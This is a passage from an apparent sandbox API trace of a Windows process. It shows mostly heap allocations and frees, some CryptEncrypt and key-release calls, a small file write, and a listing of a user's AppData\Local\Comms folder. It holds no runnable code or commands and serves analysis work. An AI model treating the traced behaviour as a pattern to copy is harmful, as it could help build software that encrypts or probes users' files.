hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0155.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0155.133] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0155.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0155.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0155.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0155.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0155.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0155.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0155.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0155.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0155.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0155.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0155.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0155.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0155.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0155.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0155.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0155.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0155.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0155.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0155.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0155.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0155.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0155.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0155.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0155.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0155.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae28 | out: hHeap=0x2af0000) returned 1 [0155.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaade0 | out: hHeap=0x2af0000) returned 1 [0155.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabd0 | out: hHeap=0x2af0000) returned 1 [0155.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0155.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0155.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0155.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0155.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0155.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0155.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad68 | out: hHeap=0x2af0000) returned 1 [0155.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad50 | out: hHeap=0x2af0000) returned 1 [0155.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad80 | out: hHeap=0x2af0000) returned 1 [0155.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0155.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0155.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0155.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab70 | out: hHeap=0x2af0000) returned 1 [0155.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac00 | out: hHeap=0x2af0000) returned 1 [0155.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabe8 | out: hHeap=0x2af0000) returned 1 [0155.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0155.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0155.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0155.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad08 | out: hHeap=0x2af0000) returned 1 [0155.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0155.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0155.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadf8 | out: hHeap=0x2af0000) returned 1 [0155.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacf0 | out: hHeap=0x2af0000) returned 1 [0155.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0155.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0155.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0155.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0155.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac00 | out: hHeap=0x2af0000) returned 1 [0155.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad98 | out: hHeap=0x2af0000) returned 1 [0155.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad20 | out: hHeap=0x2af0000) returned 1 [0155.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0155.135] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0155.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad50 | out: hHeap=0x2af0000) returned 1 [0155.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0155.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadf8 | out: hHeap=0x2af0000) returned 1 [0155.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0155.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaade0 | out: hHeap=0x2af0000) returned 1 [0155.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0155.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad08 | out: hHeap=0x2af0000) returned 1 [0155.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0155.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac00 | out: hHeap=0x2af0000) returned 1 [0155.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0155.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab58 | out: hHeap=0x2af0000) returned 1 [0155.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0155.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad08 | out: hHeap=0x2af0000) returned 1 [0155.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0155.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad98 | out: hHeap=0x2af0000) returned 1 [0155.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0155.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad20 | out: hHeap=0x2af0000) returned 1 [0155.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0155.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad80 | out: hHeap=0x2af0000) returned 1 [0155.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0155.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad50 | out: hHeap=0x2af0000) returned 1 [0155.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab58 | out: hHeap=0x2af0000) returned 1 [0155.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0155.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab70 | out: hHeap=0x2af0000) returned 1 [0155.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0155.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0155.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaab58, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0155.147] CryptEncrypt (in: hKey=0x9e1e38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8) returned 1 [0155.148] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0155.148] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0155.148] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0155.148] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0155.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0155.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaad68, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0155.148] CryptEncrypt (in: hKey=0x9e1e38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a72778*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x8 | out: pbData=0x2a72778*, pdwDataLen=0x8cef60*=0x8) returned 1 [0155.148] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0155.148] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0155.148] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0155.148] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0155.148] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0155.148] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0155.148] WriteFile (in: hFile=0x47c, lpBuffer=0x2a72648*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a72648*, lpNumberOfBytesWritten=0x8cf5e4*=0x8, lpOverlapped=0x0) returned 1 [0155.149] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0155.149] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0155.149] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0155.149] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0155.149] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0155.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0155.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaaa68, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0155.149] CryptDestroyKey (hKey=0x9e1e38) returned 1 [0155.150] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0155.150] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0155.150] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0155.150] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0155.157] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0155.157] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0155.157] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0155.157] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0155.158] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0155.158] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0155.158] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0155.158] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0155.158] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0155.158] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0155.158] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0155.158] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0155.158] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0155.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0155.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f70c0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0155.158] CryptReleaseContext (hProv=0x9be890, dwFlags=0x0) returned 1 [0155.158] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0155.158] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0155.158] FreeLibrary (hLibModule=0x76390000) returned 1 [0155.158] CloseHandle (hObject=0x47c) returned 1 [0155.159] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0155.159] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0155.159] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/Comms", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Comms", lpFilePart=0x8cedf4*="Comms") returned 0x23 [0155.159] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Comms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\comms")) returned 0x10 [0155.159] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Comms\\*.*", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x46a165bd, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xc46ec579, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x476c0de7, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName=".", cAlternateFileName="")) returned 0x9e1ab8 [0155.159] FindNextFileW (in: hFindFile=0x9e1ab8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x46a165bd, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xc46ec579, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x476c0de7, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="..", cAlternateFileName="")) returned 1 [0155.159] FindNextFileW (in: hFindFile=0x9e1ab8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x476c0de7, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xda8906a2, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xda8906a2, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Temp", cAlternateFileName="")) returned 1 [0155.160] FindNextFileW (in: hFindFile=0x9e1ab8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4713d6be, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x6d619041, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x6d619041, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Unistore", cAlternateFileName="")) returned 1 [0155.160] FindNextFileW (in: hFindFile=0x9e1ab8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x46a3c828, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xc12eebd3, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0xc12eebd3, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="UnistoreDB", cAlternateFileName="UNISTO~1")) returned 1 [0155.160] FindNextFileW (in: hFindFile=0x9e1ab8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x46a3c828, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xc12eebd3, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0xc12eebd3, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="UnistoreDB", cAlternateFileName="UNISTO~1")) returned 0 [0155.160] FindClose (in: hFindFile=0x9e1ab8 | out: hFindFile=0x9e1ab8) returned 1 [0155.162] GetLastError () returned 0x12 [0155.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0155.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0155.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0155.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0155.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0155.162] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0155.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0155.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0155.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0155.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0155.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0155.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0155.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0155.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0155.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0155.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0155.162] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0155.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0155.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0155.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa798 [0155.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0155.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0155.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5b8 [0155.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0155.163] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0155.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0155.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0155.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0155.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0155.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0155.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0155.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0155.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0155.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0155.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0155.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0155.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0155.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0155.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0155.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0155.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0155.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x29f7878 [0155.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 